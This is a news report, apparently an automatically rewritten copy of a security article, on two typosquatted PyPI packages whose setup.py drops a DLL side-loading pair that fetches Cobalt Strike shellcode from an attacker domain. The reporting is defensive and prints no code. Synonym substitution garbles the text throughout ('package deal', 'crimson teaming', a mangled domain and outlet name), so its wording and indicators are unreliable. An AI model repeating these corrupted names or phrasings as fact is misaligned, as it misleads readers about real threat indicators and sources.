Cybersecurity researchers have found two malicious packages on the Python Package deal Index (PyPI) repository that have been discovered leveraging a method known as DLL side-loading to avoid detection by safety software program and run malicious code.
The packages, named NP6HelperHttptest and NP6HelperHttper, have been every downloaded 537 and 166 occasions, respectively, earlier than they have been taken down.
“The most recent discovery is an instance of DLL sideloading executed by an open-source package deal that means the scope of software program provide chain threats is increasing,” ReversingLabs researcher Petar Kirhmajer stated in a report shared with The Hacker Information.
The title NP6 is notable because it refers to a authentic advertising and marketing automation answer made by ChapsVision. Specifically, the pretend packages are typosquats of NP6HelperHttp and NP6HelperConfig, that are helper instruments printed by one in all ChapsVision’s workers to PyPI.
In different phrases, the purpose is to trick builders looking for NP6HelperHttp and NP6HelperConfig into downloading their rogue counterparts.
Contained inside the two libraries is a setup.py script that is designed to obtain two information, an precise executable from Beijing-based Kingsoft Company (“ComServer.exe”) that is susceptible to DLL side-loading and the malicious DLL to be side-loaded (“dgdeskband64.dll”).
In side-loading the DLL, the goal is to keep away from detection of the malicious code, as noticed beforehand within the case of an npm package deal known as aabquerys that additionally leveraged the identical approach to execute code able to deploying a distant entry trojan.
The DLL, for its half, reaches out to an attacker-controlled area (“us.archive-ubuntu[.]high”) to fetch a GIF file that, in actuality, is a bit of shellcode for a Cobalt Strike Beacon, a post-exploitation toolkit used for crimson teaming.
There’s proof to recommend that the packages are a part of a wider marketing campaign that entails the distribution of comparable executables which might be inclined to DLL side-loading.
“Growth organizations want to concentrate on the threats associated to provide chain safety and open-source package deal repositories,” safety researcher Karlo Zanki stated.
“Even when they don’t seem to be utilizing open-source package deal repositories, that does not imply that risk actors will not abuse them to impersonate firms and their software program merchandise and instruments.”